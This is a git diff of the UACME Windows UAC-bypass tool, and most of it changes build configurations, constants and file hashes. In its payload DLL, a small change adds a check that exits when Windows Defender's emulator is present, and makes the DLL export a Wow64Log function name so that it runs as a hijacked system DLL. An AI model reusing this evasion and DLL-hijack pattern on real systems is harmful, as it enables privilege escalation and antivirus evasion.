b/Source/Akagi/uacme.vcxproj @@ -1,6 +1,14 @@  + + DebugConsole + Win32 + + + DebugConsole + x64 + Debug Win32 @@ -9,6 +17,14 @@ Debug x64 + + ReleaseInternalConsole + Win32 + + + ReleaseInternalConsole + x64 + ReleaseInternal Win32 @@ -40,12 +56,24 @@ v143 Unicode + + Application + true + v143 + Unicode + true v143 Unicode false + + true + v143 + Unicode + false + false v143 @@ -59,6 +87,13 @@ true Unicode + + Application + false + v143 + true + Unicode + false v143 @@ -73,27 +108,46 @@ Unicode false + + false + v143 + true + Unicode + false + + + + + + + + + + + + + true @@ -102,6 +156,13 @@ AllRules.ruleset false + + true + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + AllRules.ruleset + false + true .\output\$(Platform)\$(Configuration)\ @@ -109,6 +170,13 @@ AllRules.ruleset false + + true + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + AllRules.ruleset + false + false .\output\$(Platform)\$(Configuration)\ @@ -125,6 +193,14 @@ $(ProjectName)32 true + + false + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + NativeRecommendedRules.ruleset + $(ProjectName)32Con + true + false .\output\$(Platform)\$(Configuration)\ @@ -142,6 +218,15 @@ true true + + false + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + $(ProjectName)64Con + AllRules.ruleset + true + true + @@ -173,6 +258,37 @@ akagi.manifest + + + + + Level4 + Disabled + WIN32;_DEBUG;_WINDOWS;_UCM_CONSOLE;%(PreprocessorDefinitions) + true + false + $(ProjectDir);$(SolutionDir) + true + + + Windows + true + + + 6.1 + 6.1 + + + + + + true + useRc32;%(PreprocessorDefinitions) + + + akagi.manifest + + @@ -204,6 +320,37 @@ akagi.manifest + + + + + Level4 + Disabled + WIN32;_DEBUG;_WINDOWS;_UCM_CONSOLE;%(PreprocessorDefinitions) + true + false + $(ProjectDir);$(SolutionDir) + true + + + Windows + true + + + 6.1 + 6.1 + + + + + + + true + + + akagi.manifest + + Level4 @@ -296,6 +443,52 @@ \Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Akagi32.exe + + + Level4 + + + MaxSpeed + true + WIN32;NDEBUG;_WINDOWS;_UCM_CONSOLE;%(PreprocessorDefinitions) + Size + false + MultiThreaded + CompileAsC + true + true + None + true + true + $(ProjectDir);$(SolutionDir) + StdCall + false + + + Windows + No + true + true + + + true + 6.1 + 6.1 + + + + + + true + useRc32;%(PreprocessorDefinitions) + + + akagi.manifest + + + \Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Akagi32.exe + + Level4 @@ -385,6 +578,50 @@ \Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Akagi64.exe + + + Level4 + + + MinSpace + true + WIN32;NDEBUG;_WINDOWS;_UCM_CONSOLE;%(PreprocessorDefinitions) + Size + false + MultiThreaded + CompileAsC + true + true + true + true + $(ProjectDir);$(SolutionDir) + false + + + Windows + true + true + + + true + 6.1 + 6.1 + + + false + + + + + true + + + akagi.manifest + + + \Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Akagi64.exe + + @@ -409,6 +646,7 @@ + @@ -445,6 +683,7 @@ + @@ -462,19 +701,27 @@ true + true true true + true true + true true true + true true + true true true + true true + true true true + true diff --git a/Source/Akagi/uacme.vcxproj.filters b/Source/Akagi/uacme.vcxproj.filters index cc248a7..374a504 100644 --- a/Source/Akagi/uacme.vcxproj.filters +++ b/Source/Akagi/uacme.vcxproj.filters @@ -180,6 +180,9 @@ Source Files\methods + + Source Files + @@ -254,6 +257,9 @@ Source Files\methods + + Header Files + diff --git a/Source/Akagi/uacme.vcxproj.user b/Source/Akagi/uacme.vcxproj.user index c617d49..cf6325f 100644 --- a/Source/Akagi/uacme.vcxproj.user +++ b/Source/Akagi/uacme.vcxproj.user @@ -10,6 +10,10 @@ WindowsLocalDebugger + + + WindowsLocalDebugger + @@ -19,12 +23,24 @@ 72 WindowsLocalDebugger + + 75 + WindowsLocalDebugger + 71 WindowsLocalDebugger + + 71 + WindowsLocalDebugger + - 74 + 75 + WindowsLocalDebugger + + + 75 WindowsLocalDebugger \ No newline at end of file diff --git a/Source/Akatsuki/dllmain.c b/Source/Akatsuki/dllmain.c index 1e32b74..327ef6d 100644 --- a/Source/Akatsuki/dllmain.c +++ b/Source/Akatsuki/dllmain.c @@ -245,8 +245,11 @@ VOID WINAPI EntryPointExeMode( VOID ) { - if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) { - RtlExitUserProcess('foff'); + BOOL IsDll = RtlImageNtHeader(GetModuleHandle(NULL))->FileHeader.Characteristics & IMAGE_FILE_DLL; + if (!IsDll) { + if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) { + RtlExitUserProcess('foff'); + } + DefaultPayload(); } - DefaultPayload(); } diff --git a/Source/Akatsuki/export.def b/Source/Akatsuki/export.def index dc8ec04..cc8e3e4 100644 --- a/Source/Akatsuki/export.def +++ b/Source/Akatsuki/export.def @@ -2,6 +2,4 @@ EXPORTS Wow64LogSystemService = DummyFunc Wow64LogInitialize = DummyFunc Wow64LogTerminate = DummyFunc -Wow64LogMessageArgList = DummyFunc - -MpScanStart = EntryPointExeMode +Wow64LogMessageArgList = EntryPointExeMode diff --git a/Source/Akatsuki/version.rc b/Source/Akatsuki/version.rc index 630416b..185b093 100644 Binary files a/Source/Akatsuki/version.rc and b/Source/Akatsuki/version.rc differ diff --git a/Source/Fubuki/version.rc b/Source/Fubuki/version.rc index 5290315..05edccf 100644 Binary files a/Source/Fubuki/version.rc and b/Source/Fubuki/version.rc differ diff --git a/Source/Shared/consts.h b/Source/Shared/consts.h index cbb44fa..d7f7f9c 100644 --- a/Source/Shared/consts.h +++ b/Source/Shared/consts.h @@ -4,9 +4,9 @@ * * TITLE: CONSTS.H * -* VERSION: 3.61 +* VERSION: 3.62 * -* DATE: 22 Jun 2022 +* DATE: 04 Jul 2022 * * Global consts definition file. * @@ -24,31 +24,13 @@ #define AKAGI_XOR_KEY 'naka' #define AKAGI_XOR_KEY2 ' pta' -//"Usage: Akagi.exe [Method] [OptionalParamToExecute]" -#define IDSB_USAGE_HELP 0 - -//"Admin account with limited token required." -#define IDSB_USAGE_ADMIN_REQUIRED 1 - -//"Please enable UAC for this account." -#define IDSB_USAGE_UAC_REQUIRED 2 - -//"Wow64 detected, use x64 version of this tool." -#define ISDB_USAGE_WOW_DETECTED 3 - -//"This method only works with x86-32 Windows or from Wow64" -#define ISDB_USAGE_WOW64WIN32ONLY 4 - -//"This method fixed/unavailable in the current version of Windows, do you still want to continue?" -#define ISDB_USAGE_UACFIX 5 - //"UACMe" #define ISDB_PROGRAMNAME 6 #define UCM_VERSION_MAJOR 3 #define UCM_VERSION_MINOR 6 -#define UCM_VERSION_REVISION 1 -#define UCM_VERSION_BUILD 2206 +#define UCM_VERSION_REVISION 2 +#define UCM_VERSION_BUILD 2207 #define SUPRUNPROCESS_TIMEOUT_DEFAULT 12000 @@ -140,7 +122,7 @@ #define FUBUKI_ENTRYPOINT_SXS "MpThreatOpen" #define FUBUKI_ENTRYPOINT_PCAEXE "MpManagerStatusQuery" #define FUBUKI_ENTRYPOINT_PCADLL "MpManagerStatusQueryEx" -#define AKATSUKI_ENTRYPOINT_EXE FUBUKI_DEFAULT_ENTRYPOINT +#define AKATSUKI_ENTRYPOINT_EXE "Wow64LogMessageArgList" #pragma endregion // @@ -276,7 +258,9 @@ #define T_CLSID_EditionUpgradeManager L"{17CCA47D-DAE5-4E4A-AC42-CC54E28F334A}" #define T_CLSID_IEAAddonInstaller L"{BDB57FF2-79B9-4205-9447-F5FE85F37312}" #define T_CLSID_SecurityCenter L"{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}" -#define T_CLSID_VirtualFactoryServer L"{A6BFEA43-501F-456F-A845-983D3AD7B8F0}" +#define T_CLSID_VFServer L"{A6BFEA43-501F-456F-A845-983D3AD7B8F0}" +#define T_CLSID_VFServerDiagCpl L"{12C21EA7-2EB8-4B55-9249-AC243DA8C666}" +#define T_CLSID_DiagnosticProfile L"{D0B7E02C-E1A3-11DC-81FF-001185AE5E76}" #pragma endregion // diff --git a/Source/uacme.sln b/Source/uacme.sln index c42004a..0a19616 100644 --- a/Source/uacme.sln +++ b/Source/uacme.sln @@ -1,7 +1,7 @@  Microsoft Visual Studio Solution File, Format Version 12.00 -# Visual Studio Version 16 -VisualStudioVersion = 16.0.30503.244 +# Visual Studio Version 17 +VisualStudioVersion = 17.2.32616.157 MinimumVisualStudioVersion = 10.0.40219.1 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Akagi", "Akagi\uacme.vcxproj", "{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}" EndProject @@ -28,6 +28,11 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Akatsuki", "Akatsuki\Akatsu EndProject Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "minirtl", "minirtl", "{45D748AC-9B16-426E-808D-94662B0417F7}" ProjectSection(SolutionItems) = preProject + Shared\cmdline.c = Shared\cmdline.c + Shared\minirtl.h = Shared\minirtl.h + Shared\rtltypes.h = Shared\rtltypes.h + Shared\strtoul.c = Shared\strtoul.c + Shared\u64tohex.c = Shared\u64tohex.c Shared\_filename.c = Shared\_filename.c Shared\_strcat.c = Shared\_strcat.c Shared\_strcmp.c = Shared\_strcmp.c @@ -39,102 +44,122 @@ Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "minirtl", "minirtl", "{45D7 shared\_strncmpi.c = shared\_strncmpi.c Shared\_strncpy.c = Shared\_strncpy.c Shared\_strstri.c = Shared\_strstri.c - Shared\cmdline.c = Shared\cmdline.c - Shared\minirtl.h = Shared\minirtl.h - Shared\rtltypes.h = Shared\rtltypes.h - Shared\strtoul.c = Shared\strtoul.c - Shared\u64tohex.c = Shared\u64tohex.c EndProjectSection EndProject Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "ntos", "ntos", "{876F1157-B68F-4D0A-B963-6157B266DDE5}" ProjectSection(SolutionItems) = preProject + Shared\ntos\ntbuilds.h = Shared\ntos\ntbuilds.h Shared\ntos\ntos.h = Shared\ntos\ntos.h Shared\ntos\ntsxs.h = Shared\ntos\ntsxs.h EndProjectSection EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution - Debug|Any CPU = Debug|Any CPU Debug|Win32 = Debug|Win32 Debug|x64 = Debug|x64 - Release|Any CPU = Release|Any CPU + DebugConsole|Win32 = DebugConsole|Win32 + DebugConsole|x64 = DebugConsole|x64 Release|Win32 = Release|Win32 Release|x64 = Release|x64 - ReleaseInternal|Any CPU = ReleaseInternal|Any CPU ReleaseInternal|Win32 = ReleaseInternal|Win32 ReleaseInternal|x64 = ReleaseInternal|x64 + ReleaseInternalConsole|Win32 = ReleaseInternalConsole|Win32 + ReleaseInternalConsole|x64 = ReleaseInternalConsole|x64 EndGlobalSection GlobalSection(ProjectConfigurationPlatforms) = postSolution - {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Debug|Any CPU.ActiveCfg = Debug|Win32 {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Debug|Win32.ActiveCfg = Debug|Win32 {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Debug|Win32.Build.0 = Debug|Win32 {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Debug|x64.ActiveCfg = Debug|x64 {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Debug|x64.Build.0 = Debug|x64 - {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|Any CPU.ActiveCfg = Release|Win32 + {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.DebugConsole|Win32.ActiveCfg = DebugConsole|Win32 + {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.DebugConsole|Win32.Build.0 = DebugConsole|Win32 + {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.DebugConsole|x64.ActiveCfg = DebugConsole|x64 + {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.DebugConsole|x64.Build.0 = DebugConsole|x64 {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|Win32.ActiveCfg = Release|Win32 {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|Win32.Build.0 = Release|Win32 {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|x64.ActiveCfg = Release|x64 {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|x64.Build.0 = Release|x64 - {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|Any CPU.ActiveCfg = ReleaseInternal|x64 {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|Win32 {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|Win32 {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64 {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64 - {23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Debug|Any CPU.ActiveCfg = Debug|Win32 + {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternalConsole|Win32.ActiveCfg = ReleaseInternalConsole|Win32 + {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternalConsole|Win32.Build.0 = ReleaseInternalConsole|Win32 + {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternalConsole|x64.ActiveCfg = ReleaseInternalConsole|x64 + {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternalConsole|x64.Build.0 = ReleaseInternalConsole|x64 {23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Debug|Win32.ActiveCfg = Debug|Win32 {23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Debug|Win32.Build.0 = Debug|Win32 {23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Debug|x64.ActiveCfg = Debug|x64 - {23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Release|Any CPU.ActiveCfg = Release|Win32 + {23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.DebugConsole|Win32.ActiveCfg = Debug|Win32 + {23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.DebugConsole|Win32.Build.0 = Debug|Win32 + {23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.DebugConsole|x64.ActiveCfg = Debug|x64 + {23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.DebugConsole|x64.Build.0 = Debug|x64 {23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Release|Win32.ActiveCfg = Release|Win32 {23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Release|Win32.Build.0 = Release|Win32 {23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Release|x64.ActiveCfg = Release|x64 {23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Release|x64.Build.0 = Release|x64 - {23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternal|Any CPU.ActiveCfg = ReleaseInternal|x64 {23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|Win32 {23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|Win32 {23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64 {23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64 - {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Debug|Any CPU.ActiveCfg = Debug|Win32 + {23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternalConsole|Win32.ActiveCfg = ReleaseInternalConsole|x64 + {23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternalConsole|x64.ActiveCfg = ReleaseInternal|x64 + {23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternalConsole|x64.Build.0 = ReleaseInternal|x64 {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Debug|Win32.ActiveCfg = Debug|Win32 {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Debug|Win32.Build.0 = Debug|Win32 {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Debug|x64.ActiveCfg = Debug|x64 {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Debug|x64.Build.0 = Debug|x64 - {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|Any CPU.ActiveCfg = Release|Win32 + {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.DebugConsole|Win32.ActiveCfg = Debug|Win32 + {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.DebugConsole|Win32.Build.0 = Debug|Win32 + {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.DebugConsole|x64.ActiveCfg = Debug|x64 + {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.DebugConsole|x64.Build.0 = Debug|x64 {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|Win32.ActiveCfg = Release|Win32 {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|Win32.Build.0 = Release|Win32 {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|x64.ActiveCfg = Release|x64 {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|x64.Build.0 = Release|x64 - {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|Any CPU.ActiveCfg = ReleaseInternal|x64 {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|Win32 {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|Win32 {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64 {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64 - {304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Debug|Any CPU.ActiveCfg = Debug|x64 + {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternalConsole|Win32.ActiveCfg = ReleaseInternalConsole|x64 + {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternalConsole|x64.ActiveCfg = ReleaseInternal|x64 + {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternalConsole|x64.Build.0 = ReleaseInternal|x64 {304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Debug|Win32.ActiveCfg = Debug|x64 {304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Debug|x64.ActiveCfg = Debug|x64 {304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Debug|x64.Build.0 = Debug|x64 - {304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Release|Any CPU.ActiveCfg = Release|x64 + {304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.DebugConsole|Win32.ActiveCfg = Debug|x64 + {304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.DebugConsole|Win32.Build.0 = Debug|x64 + {304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.DebugConsole|x64.ActiveCfg = Debug|x64 + {304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.DebugConsole|x64.Build.0 = Debug|x64 {304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Release|Win32.ActiveCfg = Release|x64 {304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Release|x64.ActiveCfg = Release|x64 {304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Release|x64.Build.0 = Release|x64 - {304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternal|Any CPU.ActiveCfg = ReleaseInternal|x64 {304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|x64 {304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|x64 {304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64 {304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64 - {07EF7652-1C2D-478B-BB4B-F9560695A387}.Debug|Any CPU.ActiveCfg = Debug|x64 + {304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternalConsole|Win32.ActiveCfg = ReleaseInternalConsole|x64 + {304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternalConsole|Win32.Build.0 = ReleaseInternalConsole|x64 + {304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternalConsole|x64.ActiveCfg = ReleaseInternal|x64 + {304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternalConsole|x64.Build.0 = ReleaseInternal|x64 {07EF7652-1C2D-478B-BB4B-F9560695A387}.Debug|Win32.ActiveCfg = Debug|x64 {07EF7652-1C2D-478B-BB4B-F9560695A387}.Debug|x64.ActiveCfg = Debug|x64 {07EF7652-1C2D-478B-BB4B-F9560695A387}.Debug|x64.Build.0 = Debug|x64 - {07EF7652-1C2D-478B-BB4B-F9560695A387}.Release|Any CPU.ActiveCfg = Release|x64 + {07EF7652-1C2D-478B-BB4B-F9560695A387}.DebugConsole|Win32.ActiveCfg = Debug|x64 + {07EF7652-1C2D-478B-BB4B-F9560695A387}.DebugConsole|Win32.Build.0 = Debug|x64 + {07EF7652-1C2D-478B-BB4B-F9560695A387}.DebugConsole|x64.ActiveCfg = Debug|x64 + {07EF7652-1C2D-478B-BB4B-F9560695A387}.DebugConsole|x64.Build.0 = Debug|x64 {07EF7652-1C2D-478B-BB4B-F9560695A387}.Release|Win32.ActiveCfg = Release|x64 {07EF7652-1C2D-478B-BB4B-F9560695A387}.Release|x64.ActiveCfg = Release|x64 {07EF7652-1C2D-478B-BB4B-F9560695A387}.Release|x64.Build.0 = Release|x64 - {07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternal|Any CPU.ActiveCfg = ReleaseInternal|x64 {07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|x64 {07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|x64 {07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64 {07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64 + {07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternalConsole|Win32.ActiveCfg = ReleaseInternalConsole|x64 + {07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternalConsole|Win32.Build.0 = ReleaseInternalConsole|x64 + {07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternalConsole|x64.ActiveCfg = ReleaseInternal|x64 + {07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternalConsole|x64.Build.0 = ReleaseInternal|x64 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/UACME.sha256 b/UACME.sha256 index bf1e333..e7e9e8e 100644 --- a/UACME.sha256 +++ b/UACME.sha256 @@ -1,6 +1,6 @@ 3c798c460e6179530b090042b26cc9953e7129f95f1cdd4cef0ab8c441779557 *Bin\.empty 3655d61903d6fc9e1ce90a38d318ea547fd20772ebb4eecf0eff333cd933f646 *Source\README.md -4f1105e9d7b78e9d5b06b3b0485ea6c69709db32d3b3000892c61863c6165d12 *Source\uacme.sln +9ccf0c8c7eef918c9dd7b89dd94f0dfa7dc8779b1f9e862908b09b47b75f7d1f *Source\uacme.sln 73d30bd3b8d21a552b8b0c00a7412120db13b3ce0ce8884ed270842863b01a36 *Source\Akagi\aic.c b12885f92d7691b2823d2b921b7dda440cbcc4c6aa5a3b7c3e9e6f7af4772397 *Source\Akagi\aic.h 8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf *Source\Akagi\akagi.ico @@ -11,22 +11,24 @@ e732850b9f1b5432e5e75ac1ff4312f65e283ee9833b45b390633ea21a99b94a *Source\Akagi\b 5d1fc31a7caf39f1c766e15fb64d44f1417d3b6f2fe389f3e104218050c3746a *Source\Akagi\bin64res.rc 8776cfacd0e7e409a5f5168261089e6386eeffacedc9158c19d86dfc78e0dc61 *Source\Akagi\compress.c f648515a31961e39a4395e42689b3fba1f86e0b4a724361c4ea383f50098556c *Source\Akagi\compress.h +9209af6bfe87a818df00297bed5517be70c1d931523b71e25813365699df749a *Source\Akagi\console.c +5994c2c930bf095841520a4e6859511485f6ad0eec0d660392462402c781a6ba *Source\Akagi\console.h 273987ab3fcc9a7e9976a73ff8c6986e6e397fc3b9f179ce23991814f694a843 *Source\Akagi\encresource.h f243a7dcea8584d55890ae0b2e01c1137b923ae6ea9bdd8ae97c14f9da79b788 *Source\Akagi\fusutil.c eeddce39694b2f054aa86a7c37b2b56427209f775d27438a9427410550a2740b *Source\Akagi\fusutil.h -02dfde358a5f73516e3f773f00f05bc7e5a9d92fe96c68f48c4cb67324942058 *Source\Akagi\global.h -36bd97a1d7e41c2d0f83adfc1086163c71ea6a3cae5670c1e11cd5eb5943faaf *Source\Akagi\main.c +ac649d494877e7531fe19347f6085008ae2e7ec83cf37a117116ec0b74ccea67 *Source\Akagi\global.h +f0432754020470baca5728aa59790267492406f847c1210fc6f1ba1b1466047b *Source\Akagi\main.c 9bd3b7a206ced26ce5e03a4002bbd41e4f57b8c8c9ce4467f54221ad68e55a58 *Source\Akagi\makecab.c bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2 *Source\Akagi\makecab.h c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h -8a52c9564a6fe58ef80e1cd16a02d6970f2fe14c034f69efa34ace6e5b20baa9 *Source\Akagi\Resource.rc -cc737397035223b973289cfffc91e65e962486a2bf316deb91f28ed8449b4367 *Source\Akagi\stub.c +1cb22b2cabde481eb9aa5c7732d8d9d73bee81268177f5df06ca4d8b891c6b0e *Source\Akagi\Resource.rc +7be72ada31cc042e7dea712308f59235516a6ae1d434b24645cd4726a12b5d64 *Source\Akagi\stub.c b1b79e79880d60412e41d43b5e9ef936fdb3e66ad85e47fc0e1261ed07322d06 *Source\Akagi\stub.h -830c4adcf0e2e29d65c58bab8831858b215e5b02460b4dff1aeefc03edc8dc45 *Source\Akagi\sup.c -229859aaeed125bbd433f005d5e7f2d69a1b646b2ded1c139de9d1f3ceb6b1b4 *Source\Akagi\sup.h -c0944d3b123928849e0a860c90c83a6424fbf964d8a0099e2c0dd0d584a547ea *Source\Akagi\uacme.vcxproj -1b959b6c981dcf4cc6ef2883b72e187693c77e1faa136dd9a79d9eabb66abeca *Source\Akagi\uacme.vcxproj.filters -6418e8eb95bddcb15c50d3efd515105f97b082d5913af7cd4d22a6327e315d37 *Source\Akagi\uacme.vcxproj.user +94cbce1a20dca7c2f28dc2eed80583b7f2f93074dc8efbec136d6b387a848ecf *Source\Akagi\sup.c +6a873758e9c86e23f658eca6a05437f55b9881f9ac324757c723caa8c053a9ca *Source\Akagi\sup.h +e6b96e43c3a1a8de682f16086ea8639cfe4649092fc2f47e26fb5baa42a70caf *Source\Akagi\uacme.vcxproj +fa20d8ff56109734866c6baed5d8be316d4d24a5dbf074e0e90d7e458978de1c *Source\Akagi\uacme.vcxproj.filters +b7b4f1a3feca83982fc1024eb3aecae605ae725a160c540dbe70e7e2acd5d556 *Source\Akagi\uacme.vcxproj.user fd2bf3f4369850efc4c408133ddf253ced6f0b400b13997060c50a2f9b6cc9d0 *Source\Akagi\uas.h 750326700ffeeac7f34aa111af345fec1c221f519347e57e35b96454fcc044f6 *Source\Akagi\appinfo\appinfo.acf 2a63a2c3f43afb1f3fb091ffa71bd4d67b64e6d0b220e97057542883bce246f5 *Source\Akagi\appinfo\appinfo.idl @@ -43,19 +45,19 @@ e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 *Source\Akagi\b dd310c7a9d558083387ae42d137624df205051094b619f59edf7899af42104c8 *Source\Akagi\methods\api0cradle.c e68ccf0f4bdadb215789b0701e1a9dd8f23afb5ca24a9eace04c36027b751a6f *Source\Akagi\methods\azagarampur.c 574a8de72c4661a520afbcdbe4580335203d0f1b9da5d9ba3659d30d02b89466 *Source\Akagi\methods\comsup.c -4376f3b6bdcdc47a7fdd90247d68e4c84982cb7743617259fb52fe92ef815062 *Source\Akagi\methods\comsup.h +0cd9d063436aba8ea888e8f1f1ee97ea04ba7337f60be27f4d67c6acedb8f470 *Source\Akagi\methods\comsup.h cb1bf87f2976eb49c5560b16a69c742b39706c48314bcc0bdeeaf545910bd380 *Source\Akagi\methods\dwells.c -2b3f62e53ce8f70444e860100880799b535b8ae259ceaed5be0b2ffe44cea62a *Source\Akagi\methods\elvint.h +2e64396f0b5cc2f6e59f5d329ffbb1ef0e6dd5e0547bd6fff5567f72cca6ace9 *Source\Akagi\methods\elvint.h 49d94561eee009acc25c36857bb0260dd8d8a38e6cdf0286a49463d90724b9b1 *Source\Akagi\methods\hakril.c 